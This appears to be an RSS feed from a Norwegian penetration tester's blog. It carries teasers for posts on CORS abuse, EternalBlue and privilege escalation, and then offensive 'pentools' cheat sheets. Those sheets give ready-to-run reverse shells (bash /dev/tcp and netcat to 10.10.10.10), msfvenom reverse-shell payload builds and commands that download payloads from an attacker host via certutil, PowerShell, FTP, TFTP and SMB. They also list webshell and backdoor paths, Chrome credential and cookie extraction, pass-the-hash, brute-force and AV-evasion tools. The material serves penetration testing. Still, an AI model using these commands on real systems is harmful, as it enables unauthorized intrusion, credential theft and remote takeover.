https://blogs.law.harvard.edu/tech/rss https://root4loot.com/ Recent content on root4loot https://root4loot.com/ /img/opengraph.png 1440 After Dark 7.2.1 (Hugo 0.55.1) en-US Sun, 29 Mar 2020 00:00:00 +0000 https://root4loot.com/about/ Sun, 29 Mar 2020 00:00:00 +0000 root4loot https://root4loot.com/about/ My name is Daniel Antonsen and I’m a security researcher from Norway. I have a degree in Information Security from NTNU Norway and work as a full-time penetration tester in Oslo. Work keeps me very busy so I don’t have much time to spare on this blog but, I am planning on coming out with some new projects soon so stay tuned for that - follow me on Twitter if you’re interested or if you wanna link up. https://root4loot.com/post/announcing_rescope_v1.0/ Tue, 16 Apr 2019 00:00:00 +0200 [root4loot] https://root4loot.com/post/announcing_rescope_v1.0/ It’s been roughly one month since rescope first got introduced and the feedback so far has been nothing but positive. Given that I was so new to twitter and everything, I didn’t know what to expect. Heck, with less than 20 followers at the time, I was surprised that anyone even saw the tweet, let alone click it. I dunno what happened, but somehow it gained some traction and before I knew, it was featured on pentester. Tools https://root4loot.com/post/abusing_cors_origin/ Sun, 31 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/abusing_cors_origin/ In this post we will look at what happens when CORS Origin is not validated correctly and explore some ways this can be abused to exfiltrate data. My initial idea with this was to cover the MITM part (improper scheme validation) in greater detail, but I figured why not include the others as well. I won’t go into the cause of the problem, but rather focus on the symptoms and try to provide some clear examples of how this can be approached from an attackers’ POV. Security https://root4loot.com/post/introducing_rescope/ Sat, 16 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/introducing_rescope/ rescope is a tool I wrote (in Go) that lets you quickly define scopes in Burp/ZAP- mainly intended for “bug hunters”, and pentesters who deal with larger scopes. Update As for rescope v1.0 it is now possible to parse scopes straight from any major "bug-bounty-as-a-service" program. See Github and [Blog post](https://root4loot.com/post/announcing_rescope_v1.0/) for details. Simply give it a file (scope) containing target identifiers and rescope parses this to regex & spits out a file that can be imported to either Burp or ZAP directly. Tools https://root4loot.com/post/eternalblue_manual_exploit/ Sat, 16 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/eternalblue_manual_exploit/ For educational purposes only There may be times when you want to exploit MS17-010 (EternalBlue) without having to rely on using Metasploit. Perhaps you want to run it from a ‘Command & Control’ system without msf installed, run a quick demo or execute on the go. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside, however, is an increased risk of crashing the target. Security https://root4loot.com/post/docker-privilege-escalation/ Fri, 15 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/docker-privilege-escalation/ I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it; it is a way of isolating software packages by virtualizing them on an OS-level which runs in “containers.” It works in a similar way to traditional virtual machines, but with much less overhead as the kernel is shared between multiple containers. The problem arises when the docker group is assigned to the host user. Security https://root4loot.com/post/exploiting_cpickle/ Fri, 15 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/exploiting_cpickle/ Pickle is a serialization/deserialization module found within the standard Python library. For those unfamiliar with serialization and deserialization; it is a way of converting objects and data structures to files or databases so that they can be reconstructed later (possibly in a different environment). This process is called serialization and deserialization, but in Python, it is called pickling and unpickling. One big caveat to pickle however, is that it does not perform any “security checking” on the data that is being unpickled, meaning that an attacker having access to the endpoint can potentially gain remote code execution by serving malicious input. Security https://root4loot.com/post/pip-install-privilege-escalation/ Fri, 15 Mar 2019 00:00:00 +0100 [root4loot] https://root4loot.com/post/pip-install-privilege-escalation/ If you happen to have a user shell on a system and you see that user has sudo rights to pip install, then escalation becomes super easy. alice@jada:~$ sudo -l [sudo] password for alice: Matching Defaults entries for alice on jada: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on jada: (root) /usr/bin/pip install * In that case, what you can do is create a malicious setup.py on target system: Security https://root4loot.com/pentools/av-evasion/ root4loot https://root4loot.com/pentools/av-evasion/ Veil Python script designed to generate metasploit payloads that bypass common anti-virus solutions. Usage: python Veil-Evasion.py peCloak Python script that takes an automated approach to AV evasion. Usage: peCloak.py [[options]] [path_to_pe_file] Example: python peCloak.py plink.exe .. New file saved [plink_1540964122_cloaked.exe] OWASP ZSC Open source software in Python language which lets you generate customized shellcodes and convert scripts to an obfuscated script. Usage: ./zsc zsc> help [+] shellcode generate shellcode [+] shellcode>generate to generate shellcode [+] shellcode>search search for shellcode in shellstorm [+] shellcode>download download shellcodes from shellstorm [+] shellcode>shell_storm_list list all shellcodes in shellstorm [+] obfuscate generate obfuscate code [+] back Go back one step [+] clear clears the screen [+] help show help menu [+] update check for update [+] about about owasp zsc [+] restart restart the software [+] version software version [+] exit/quit to exit the software [+] # insert comment [+] zsc -h, --help basic interface help https://root4loot.com/pentools/information-gathering/active/ root4loot https://root4loot.com/pentools/information-gathering/active/ AQUATONE Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface. Example Usage: cat targets.txt | aquatone cat hosts.txt | aquatone -ports 80,443,3000,3001 cat hosts.txt | aquatone -ports large Discover Scripts Custom bash scripts used to automate various pentesting tasks. Usage: See https://github.com/leebaird/discover Eyewitness EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://root4loot.com/pentools/brute-force/ root4loot https://root4loot.com/pentools/brute-force/ Ncrack High-speed network authentication cracking tool. Examples: SSH: ncrack -u testuser -P wordlist.txt <host> -p 22 RDP: ncrack -u testuser -P wordlist.txt <host> -p 3389 FTP: ncrack -u testuser -P wordlist.txt <host> -p 21 Medusa Login brute-forcer tool designed to be speedy, parallel and modular. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few. Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] Examples: SSH: medusa -u testuser -P wordlist. https://root4loot.com/pentools/file-transfers/windows/certutil/ root4loot https://root4loot.com/pentools/file-transfers/windows/certutil/ certutil.exe is a Windows CMD utility that comes pre-loaded in Windows as part of the certificate services. It can be used to transfer files from any web server, much like wget, which is very handy. Example: certutil -URLCache -f http://<attacker_ip>/payload.exe C:\temp\payload.exe https://root4loot.com/pentools/command-control/ root4loot https://root4loot.com/pentools/command-control/ dnscat2 Tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network. Usage: ./dnscat DropboxC2C Post-exploitation agent which uses Dropbox Infrastructure for command and control operations. Structure: main.py - The "server" part which manages all the agents. agent.py - The "client" part which does what the server tells. 1. Modify the API Key on agent.py and main.py (the api key must be created from the dropbox web interface) 2. https://root4loot.com/pentools/databases/ root4loot https://root4loot.com/pentools/databases/ NoSQLMap Open source Python-based automated NoSQL MongoDB exploitation tool. Usage: python NoSQLMap SQLmap Open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. Usage: python sqlmap [options] Examples: python sqlmap.py -u "http://targetsite.com/vuln.php" python sqlmap.py -u "http://targetsite.com/login.aspx" --method POST --data "username=foo&password=bar&submit=login" --dbms=mssql --tables https://root4loot.com/pentools/file-transfers/linux/ftp/ root4loot https://root4loot.com/pentools/file-transfers/linux/ftp/ Start atftpd service: service vsftpd start Create FTP script on target as follows. Make sure lcd path is writable: echo open <attacker_ip> > ftp.txt echo user anonymous pass >> ftp.txt echo binary >> ftp.txt echo 'lcd /tmp/' >> ftp.txt echo get payload.php >> ftp.txt echo bye >> ftp.txt Execute script to transfer file: ftp -n >> /tmp/ftp.txt https://root4loot.com/pentools/file-transfers/windows/ftp/ root4loot https://root4loot.com/pentools/file-transfers/windows/ftp/ Start FTP server: python -m pyftpdlib --username=USER --password=PASS -p 21 Create FTP script on target: echo open <attacker_ip> > ftp.txt echo USER >> ftp.txt echo PASS >> ftp.txt echo binary >> ftp.txt echo get payload.exe >> ftp.txt echo bye >> ftp.txt Run script to transfer file: ftp -s:ftp.txt https://root4loot.com/pentools/payloads/generic/ root4loot https://root4loot.com/pentools/payloads/generic/ Bash reverse shell bash -i >& /dev/tcp/10.10.10.10/443 0>&1 Netcat reverse shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 443 > /tmp/f Web shells JSP: /opt/SecLists/Web-Shells/JSP/simple-shell.jsp PHP: /opt/SecLists/Web-Shells/PHP/obfuscated-phpshell.php Wordpress: /opt/SecLists/Web-Shells/WordPress/access.php Pentestmonkey: ASP: /usr/share/webshells/asp/cmd-asp-5.1.asp /usr/share/webshells/asp/cmdasp.asp ASPX: /usr/share/webshells/aspx/cmdasp.aspx CFM: /usr/share/webshells/cfm/cfexec.cfm JSP: /usr/share/webshells/jsp/cmdjsp.jsp /usr/share/webshells/jsp/jsp-reverse.jsp PERL: /usr/share/webshells/perl/perlcmd.cgi /usr/share/webshells/perl/perl-reverse-shell.pl PHP: /usr/share/webshells/php/php-backdoor.php /usr/share/webshells/php-reverse-shell.php /usr/share/webshells/simple-backdoor.php https://root4loot.com/pentools/post-exploitation/linux/ root4loot https://root4loot.com/pentools/post-exploitation/linux/ LinEnum Bash script for local linux enumeration & privilege escalation checks. Usage: ./linenum.sh linux-exploit-suggester Linux privilege escalation auditing tool. Usage: ./linux-exploit-suggester.sh Linux Exploit Suggester Perl based linux privesc checker. Running without arguments will perform a ‘uname -r’ to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Kernel version can be specified with the -k flag. Usage: perl ./Linux_Exploit_Suggester.pl linuxprivchecker Linux privilege escalation check script. https://root4loot.com/pentools/post-exploitation/macos/ root4loot https://root4loot.com/pentools/post-exploitation/macos/ rootOS macOS Root Helper (Python) Usage: python root.py https://root4loot.com/pentools/miscellaneous/ root4loot https://root4loot.com/pentools/miscellaneous/ httprobe Take a list of domains and probe for working HTTP and HTTPS servers. Example usage: cat domains.txt | httprobe | tee alive.txt cat domains.txt | httprobe -p http:8080 -p https:4443 | tee alive.txt RTFM RTFM (Red Team Field Manual) is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it. https://root4loot.com/pentools/payloads/msfvenom/ root4loot https://root4loot.com/pentools/payloads/msfvenom/ List payloads: msfvenom -l payloads Staged: /shell/reverse_tcp & /meterpreter/reverse_tcp Stageless: /shell_reverse_tcp The majority of payloads below are unstaged. Windows x86 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x86 -e generic/none -f exe -o payload.exe x64 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x64 -e generic/none -f exe -o payload.exe Meterpreter: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe > payload.exe Shellcode(C): msfvenom -p windows/shell_reverse_tcp LHOST=10. https://root4loot.com/pentools/post-exploitation/multi-platform/ root4loot https://root4loot.com/pentools/post-exploitation/multi-platform/ Pupy Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python Usage: ./start-compose.sh https://root4loot.com/pentools/network-related/ root4loot https://root4loot.com/pentools/network-related/ Airgeddon A multi-use bash script for Linux systems to audit wireless networks. Usage: sudo bash airgeddon.sh SPARTA Python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. Usage: ./sparta SSH Pivoting with SSH. Port forwarding: Local: ssh <gateway> -L <local port to listen>:<remote host>:<remote port> Remote: ssh <gateway> -R <remote port to bind>:<local host>:<local port> Dynamic: ssh <gateway> -D <port to bind> Plink https://root4loot.com/pentools/payloads/other/ root4loot https://root4loot.com/pentools/payloads/other/ SharPyShell SharPyShell (Python) is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime. Example usage: python SharPyShell.py generate -p somepassword python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword https://root4loot.com/pentools/information-gathering/passive/ root4loot https://root4loot.com/pentools/information-gathering/passive/ Amass The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing (warning: active), crawling web archives, permuting/altering names and reverse DNS sweeping. Usage example: ./amass -src -ip -config amass_config.ini -d owasp.org ct-exposer An OSINT tool that discovers sub-domains by searching Certificate Transparency logs. The nice thing about this one is that you can export output to masscan format. usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m] optional arguments: -h, --help show this help message and exit -d DOMAIN, --domain DOMAIN domain to query for CT logs, ex: domain. https://root4loot.com/pentools/file-transfers/windows/powershell/ root4loot https://root4loot.com/pentools/file-transfers/windows/powershell/ Create ps1 script on target as follows: echo $fileURL = "http://<attacker_ip>/payload.exe" > wget.ps1 echo $fileName = "C:\path_to\payload.exe" >> wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $webclient.DownloadFile($fileURL,$fileName) >> wget.ps1 Execute script to get file from web server: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 https://root4loot.com/pentools/printers/ root4loot https://root4loot.com/pentools/printers/ Praedasploit Contains a number of commonly found printer exploits. Usage: See https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules PRET Printer Exploitation Toolkit - The tool that made dumpster diving obsolete. Usage: ./pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl} Example usage: ./pret.py laserjet.lan ps ./pret.py /dev/usb/lp0 pjl https://root4loot.com/pentools/file-transfers/windows/smb/ root4loot https://root4loot.com/pentools/file-transfers/windows/smb/ Start SMB server with Impacket: python smbserver.py SHARENAME /path/to/shared/folder Run the following on target to transfer file: copy \\<attacker_ip>\SHARENAME\payload.exe https://root4loot.com/pentools/file-transfers/linux/ssh/ root4loot https://root4loot.com/pentools/file-transfers/linux/ssh/ Usage: scp <source> <destination> Copy file from attacker to target: scp username@b:/path/to/file /path/to/destination Copy file from target to attacker: scp /path/to/file username@a:/path/to/destination https://root4loot.com/pentools/samba/ root4loot https://root4loot.com/pentools/samba/ CrackMapExec A post-exploitation tool that helps automate assessing the security of large Active Directory networks. CME makes heavy use of the Impacket library. Examples usage: crackmapexec <protocol> 192.168.1.0/24 crackmapexec <protocol> ~/targets.txt Pass-the-hash: crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH crackmapexec smb <target(s)> -u username -H NTHASH Null sessions: crackmapexec smb <target(s)> -u '' -p '' enum4linux A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. https://root4loot.com/pentools/file-transfers/linux/tftp/ root4loot https://root4loot.com/pentools/file-transfers/linux/tftp/ Start atftpd service (see configuration): service atftpd start Run the following on target to transfer file: tftp -i <attacker_ip> GET payload.rb https://root4loot.com/pentools/file-transfers/windows/tftp/ root4loot https://root4loot.com/pentools/file-transfers/windows/tftp/ Start atftpd service (see configuration): service atftpd start Run the following on target to transfer file: tftp -i <attacker_ip> GET payload.exe https://root4loot.com/pentools/web/ root4loot https://root4loot.com/pentools/web/ Arjun Arjun is a HTTP parameter discovery suite. Example usage: Find GET parameters: python3 arjun.py -u https://api.example.com/endpoint --get Find POST parameters python3 arjun.py -u https://api.example.com/endpoint --post Multi-threading: python3 arjun.py -u https://api.example.com/endpoint --get -t 22 Delay between requests: python3 arjun.py -u https://api.example.com/endpoint --get -d 2 Add HTTP headers: python3 arjun.py -u https://api.example.com/endpoint --get --headers BeEF Exploitation Framework A cross-site scripting (XSS) attack framework. Usage: ./beef Burp An awesome graphical tool for testing Web application security. https://root4loot.com/pentools/post-exploitation/windows/ root4loot https://root4loot.com/pentools/post-exploitation/windows/ BrowserGather Powershell script to extract sensitive browser information from Chrome, Firefox and IE. First, import the module: import-module .\BrowserGather.ps1 Extract credentials: Get-ChromeCreds "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data" | format-list * Extract cookies: Get-ChromeCookies "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies" | format-list * Empire Powerful PowerShell & Python post-exploitation agent. Usage: ./empire Tips and tricks: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ Unicorn A simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Usage: python unicorn. https://root4loot.com/pentools/wordlist-generators/ root4loot https://root4loot.com/pentools/wordlist-generators/ CeWl A ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. Usage: cewl [OPTIONS] ... <url> Example: cewl http://example.com --depth=4 --write=output.txt Crunch Wordlist generator based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.